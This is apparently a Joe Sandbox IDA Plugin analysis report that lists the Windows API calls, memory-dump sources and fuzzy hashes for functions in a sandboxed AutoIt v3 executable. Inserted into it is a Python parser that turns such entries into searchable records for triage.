• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: t53$t53$t53$t53$t53t53
• API String ID: 1385522511-1124980192

Control-flow Graph

APIs
  • Part of subcall function 0026327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002632AF
  • Part of subcall function 0026327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 002632B7
  • Part of subcall function 0026327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002632C2
  • Part of subcall function 0026327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002632CD
  • Part of subcall function 0026327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 002632D5
  • Part of subcall function 0026327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 002632DD
  • Part of subcall function 00263205: RegisterWindowMessageW.USER32(00000004,?,00262964), ref: 0026325D
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00262A0A
• OleInitialize.OLE32 ref: 00262A28
• CloseHandle.KERNEL32(00000000,00000000), ref: 002A3A0D
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID: (&3$0$3$4'3$d(3$$3
• API String ID: 1986988660-1084729728

Control-flow Graph
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d5bae1650293eaefa747d1c41dc396327c3113119c9d3480bc6d62a8b6c63e1a
• Instruction ID: a92e0bb1dbf89c6cf43cb8b4c446b57f7d27c3cbe898c61e6daca9ee37d449ed
• Opcode Fuzzy Hash: d5bae1650293eaefa747d1c41dc396327c3113119c9d3480bc6d62a8b6c63e1a
• Instruction Fuzzy Hash: 08C1F57492424AAFDF12DFACD841BADBBB4AF09320F08419DE514A73D2C77099A1CF61

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1777 2635b3-263623 CreateWindowExW * 2 ShowWindow * 2
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002635E1
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00263602
• ShowWindow.USER32(00000000,?,?,?,?,?,?,00263368,?), ref: 00263616
• ShowWindow.USER32(00000000,?,?,?,?,?,?,00263368,?), ref: 0026361F
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: d69fcc8646864ba991dd41c73036328ab6c7f7afd0ed27cd895e7d0b4cc4227d
• Instruction ID: 3e2032ef4740300d5e4a16592640abd2927d6aeb49573807aaf090eb70f8e19e
• Opcode Fuzzy Hash: d69fcc8646864ba991dd41c73036328ab6c7f7afd0ed27cd895e7d0b4cc4227d
• Instruction Fuzzy Hash: 89F03A786002987AE73217137C8CF376EBED7C7F71F10002EBA04AB260C2691855EAB0

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1872 29316b-293182 GetLastError 1873 293190-293197 call 294ff0 1872->1873 1874 293184-29318e call 293581 1872->1874 1878 29319c-2931a2 1873->1878 1874->1873 1879 2931e1-2931e8 SetLastError 1874->1879 1880 2931ad-2931bb call 2935d7 1878->1880 1881 2931a4 1878->1881 1882 2931ea-2931ef 1879->1882 1887 2931bd-2931be 1880->1887 1888 2931c0-2931d6 call 292f56 call 292d38 1880->1888 1883 2931a5-2931ab call 292d38 1881->1883 1891 2931d8-2931df SetLastError 1883->1891 1887->1883 1888->1879 1888->1891 1891->1882
APIs
• GetLastError.KERNEL32(0000000A,?,?,0028F64E,0028545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00293170
• _free.LIBCMT ref: 002931A5
• _free.LIBCMT ref: 002931CC
• SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 002931D9
• SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 002931E2
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 90d068c52925803c3b6f7ac6196d149424a3b5ec98f660478cdf7387ed82d972
• Instruction ID: 7315610687025ddccf37399899b2635a9ffd2e5efa310086a379ef830e553526
• Opcode Fuzzy Hash: 90d068c52925803c3b6f7ac6196d149424a3b5ec98f660478cdf7387ed82d972
• Instruction Fuzzy Hash: D40149722746017B8F22AA34AC89D3B265D9FC53B17200038F929D21B1EE61CB324960
APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002A5287
  • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00266299
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_wcslen
• String ID: Line %d: $AutoIt -
• API String ID: 2289894680-4094128768
• Opcode ID: 14632916b9ed2ec4a2ecfc93be4b95a5766ce205dbc93819dee42b913db3b424
• Instruction ID: 0ad7c69a63cfd588fd96efa14d6e770b3e4f02e6a6bf6f197561274ed30e891a
• Opcode Fuzzy Hash: 14632916b9ed2ec4a2ecfc93be4b95a5766ce205dbc93819dee42b913db3b424
• Instruction Fuzzy Hash: BF41D571428315ABC311EB60EC95FDF77DCAF45324F00462EF999920A1EF7096A9CB92
APIs
• CloseHandle.KERNEL32(00000000,00000000,?,OV*,0029894C,?,00329CE8,0000000C,002989AB,?,OV*,?,002A564F), ref: 00298A84
• GetLastError.KERNEL32 ref: 00298A8E
• __dosmaperr.LIBCMT ref: 00298AB9
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID: OV*
• API String ID: 2583163307-3017613547
• Opcode ID: 1a7cb08c32f89cc144b49b3136de97b9a4bbb78a069a5cdf09a768ae8207a61b
• Instruction ID: f0c694c2063b68b35eb6320a2ace73d596ead9b72e4b9ad3b57e1efa0494017d
• Opcode Fuzzy Hash: 1a7cb08c32f89cc144b49b3136de97b9a4bbb78a069a5cdf09a768ae8207a61b
• Instruction Fuzzy Hash: 96014E32B351716BCE256A74BC85B7E67494B83774F2D025AF9148B1D2EF708DA04B90
APIs
• RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,002658BE,SwapMouseButtons,00000004,?), ref: 002658EF
• RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,002658BE,SwapMouseButtons,00000004,?), ref: 00265910
• RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,002658BE,SwapMouseButtons,00000004,?), ref: 00265932
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: 69d2225f85bea8d306464112d4f00c691714841319d45bced8c0b6ac324ba278
• Instruction ID: 9a997c5a20a4e4a10bacf184246e295335c0a673cb498ccd5e0d911173f5b7ba
• Opcode Fuzzy Hash: 69d2225f85bea8d306464112d4f00c691714841319d45bced8c0b6ac324ba278
• Instruction Fuzzy Hash: 21115A75522628FFDB218F64DC84EAE77B9EF00764F104429E801E7210E6319E91D7A0
APIs
• __Init_thread_footer.LIBCMT ref: 00273006
Strings
Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                        • String ID: CALL$bn,
                                                                                                                                                                        • API String ID: 1385522511-1752176152
                                                                                                                                                                        • Opcode ID: a6c73fdb7d68a98daf409c4aae4d69ec07bc9a37a117b0b541cd2e2b7628c3b7
                                                                                                                                                                        • Instruction ID: d6babe585494ff09ba3ca023dd4e66a45f5de9defe47654d74099e5bef6ef154
                                                                                                                                                                        • Opcode Fuzzy Hash: a6c73fdb7d68a98daf409c4aae4d69ec07bc9a37a117b0b541cd2e2b7628c3b7
                                                                                                                                                                        • Instruction Fuzzy Hash: AA229B70628202DFC714DF24C884A2ABBF1BF94354F14895DF49A8B3A1D771E9A5CF52
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 002A413B
                                                                                                                                                                          • Part of subcall function 00265851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002655D1,?,?,002A4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00265871
                                                                                                                                                                          • Part of subcall function 00263A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00263A76
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                        • String ID: X$`u2
                                                                                                                                                                        • API String ID: 779396738-861494381
                                                                                                                                                                        • Opcode ID: 91ce18058c09f92b4d79859b64c9c95e8ed946209c6878c9d0811979185542cb
                                                                                                                                                                        • Instruction ID: 00130eb3dcc6a93bebf93ab9937ca1de28288056370400cefaa16ba807d27d5d
                                                                                                                                                                        • Opcode Fuzzy Hash: 91ce18058c09f92b4d79859b64c9c95e8ed946209c6878c9d0811979185542cb
                                                                                                                                                                        • Instruction Fuzzy Hash: 0D21C371A202589BCB01DF94D845BEE7BFCAF49310F008019E445B7281DFF49A998FA1
                                                                                                                                                                        APIs
                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 002809D8
                                                                                                                                                                          • Part of subcall function 00283614: RaiseException.KERNEL32(?,?,?,002809FA,?,00000000,?,?,?,?,?,?,002809FA,00000000,00329758,00000000), ref: 00283674
                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 002809F5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                        • String ID: Unknown exception
                                                                                                                                                                        • API String ID: 3476068407-410509341
                                                                                                                                                                        • Opcode ID: 9de8148d8bb6da35e94408b6d0ea6ba02ff88754180eeb42d7494f103eeb9051
                                                                                                                                                                        • Instruction ID: e324083059c6c9fb0b9b8f48969eebc786d749b29dcdefe3eb3a1aec688eba7c
                                                                                                                                                                        • Opcode Fuzzy Hash: 9de8148d8bb6da35e94408b6d0ea6ba02ff88754180eeb42d7494f103eeb9051
                                                                                                                                                                        • Instruction Fuzzy Hash: D9F0A43C92220DB6CB44BAA8EC8699E776C5E01B50B504121F918965D2FB70E63DCB90
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 002E8D52
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 002E8D59
                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 002E8F3A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 146820519-0
                                                                                                                                                                        • Opcode ID: 8b265ab20d6dd560737bbe7867078c094d4708bda31d3762fb4ccbecc30d161f
                                                                                                                                                                        • Instruction ID: c9b04119f35c5d64630adf3469eee0ac8fb332dcf4fae4e2e9a25b0c21c222bf
                                                                                                                                                                        • Opcode Fuzzy Hash: 8b265ab20d6dd560737bbe7867078c094d4708bda31d3762fb4ccbecc30d161f
                                                                                                                                                                        • Instruction Fuzzy Hash: 47128A71A183419FC714CF28C484B2ABBE5BF89314F54895EE8898B392DB31ED55CF92
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002661A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00266299
                                                                                                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 0027FD36
                                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0027FD45
                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002BFE33
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3500052701-0
                                                                                                                                                                        • Opcode ID: 0d05ef8ca0221d1c5d2e2d36752d4056999634574341794f66d25c4114970bd7
                                                                                                                                                                        • Instruction ID: 7d6db3fbe81a09ef035cc7907914b4b85c69013ced0afd4be1e02cbce2be635f
                                                                                                                                                                        • Opcode Fuzzy Hash: 0d05ef8ca0221d1c5d2e2d36752d4056999634574341794f66d25c4114970bd7
                                                                                                                                                                        • Instruction Fuzzy Hash: EF31D471914344AFEB728F248C85BE7BBECAB02308F0004AED5DA57242D3745A94CB51
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,002997BA,FF8BC369,00000000,00000002,00000000), ref: 00299744
                                                                                                                                                                        • GetLastError.KERNEL32(?,002997BA,FF8BC369,00000000,00000002,00000000,?,00295ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00286F41), ref: 0029974E
                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00299755
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2336955059-0
                                                                                                                                                                        • Opcode ID: e0f2edda4249e352130c0f6b30f5c144f55e881cf82e7e55f1ede319ae19c513
                                                                                                                                                                        • Instruction ID: afc41c9a65730bc5c2c028e59b376a9eb5c609682e94f036fc561047e5734fd9
                                                                                                                                                                        • Opcode Fuzzy Hash: e0f2edda4249e352130c0f6b30f5c144f55e881cf82e7e55f1ede319ae19c513
                                                                                                                                                                        • Instruction Fuzzy Hash: 83012836630115ABCF159FDDEC468AEBB2ADB85330B240359F81197190EA70DDA1DBA0
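The function entries above follow a fixed layout (an "APIs" header, one bullet per API reference, then "Memory Dump Source" and "Similarity" fields such as the API ID, Opcode ID and Instruction Fuzzy Hash). When triaging a report like this one, an analyst usually wants those fields as records so they can pivot: which functions call TerminateProcess, which Opcode ID to search for in other reports, which process the dump belongs to. The parser below is an added example and is not Joe Sandbox's code or part of the original report. It operates on a sample constructed from two of the entries on this page, copied with the indentation removed; the mapping of the first hex field of the .sdmp name to the process ID (0000000B, matching the 11 in hcaresult_11_2_260000_Hc.jbxd) is an assumption about the naming convention, labelled as such in the code.

```python
import re
from dataclasses import dataclass, field
from typing import NamedTuple

# Constructed sample: two function entries copied from this report, unindented.
SAMPLE = """APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 002809D8
  • Part of subcall function 00283614: RaiseException.KERNEL32(?,?,?,002809FA,?,00000000,?,?,?,?,?,?,002809FA,00000000,00329758,00000000), ref: 00283674
• __CxxThrowException@8.LIBVCRUNTIME ref: 002809F5
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• Opcode ID: 9de8148d8bb6da35e94408b6d0ea6ba02ff88754180eeb42d7494f103eeb9051
• Instruction Fuzzy Hash: D9F0A43C92220DB6CB44BAA8EC8699E776C5E01B50B504121F918965D2FB70E63DCB90
APIs
• GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 002E8D52
• TerminateProcess.KERNEL32(00000000), ref: 002E8D59
• FreeLibrary.KERNEL32(?,?,?,?), ref: 002E8F3A
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Similarity
• API ID: Process$CurrentFreeLibraryTerminate
• String ID:
• Opcode ID: 8b265ab20d6dd560737bbe7867078c094d4708bda31d3762fb4ccbecc30d161f
• Instruction Fuzzy Hash: 47128A71A183419FC714CF28C484B2ABBE5BF89314F54895EE8898B392DB31ED55CF92
"""

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR"; the optional
# "Part of subcall function XXXX:" prefix marks calls reached via a callee.
API_CALL_RE = re.compile(
    r"^•\s+(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s+)?"
    r"(?P<api>[\w@]+)\.(?P<module>[A-Z0-9]+)\b.*?ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
FIELD_RE = re.compile(
    r"^•\s+(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash|Source File):\s*(?P<val>.*)$"
)


class ApiCall(NamedTuple):
    api: str
    module: str
    ref: str          # address of the call site in the dumped image
    via_subcall: bool # True when listed as "Part of subcall function"


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)


def parse_report(text: str) -> list:
    """Split the report text into one FunctionEntry per 'APIs' block."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_CALL_RE.match(line)
        if m:
            cur.apis.append(ApiCall(m["api"], m["module"], m["ref"].upper(), m["sub"] is not None))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"].strip()
    return entries


def find_by_api(entries, api_name, include_subcalls=False):
    """Entries that reference api_name directly (or via subcalls if requested)."""
    return [e for e in entries
            if any(c.api == api_name and (include_subcalls or not c.via_subcall) for c in e.apis)]


def opcode_index(entries):
    """Opcode ID -> entry, for pivoting on the same function across reports."""
    return {e.fields["Opcode ID"]: e for e in entries if "Opcode ID" in e.fields}


def process_id(entry):
    # Assumption: the first dot-separated hex field of the .sdmp name is the PID
    # (0000000B here, consistent with the "11" in hcaresult_11_2_260000_Hc.jbxd).
    return int(entry.fields["Source File"].split(".")[0], 16)


if __name__ == "__main__":
    for e in parse_report(SAMPLE):
        direct = [c.api for c in e.apis if not c.via_subcall]
        print(f"pid={process_id(e)} apis={direct} opcode={e.fields['Opcode ID'][:16]}...")
```

Running it on a whole report rather than the sample only requires feeding the saved page text to parse_report; subcall references are kept but flagged, so a search for TerminateProcess matches the function that actually contains the call rather than every caller above it.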
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
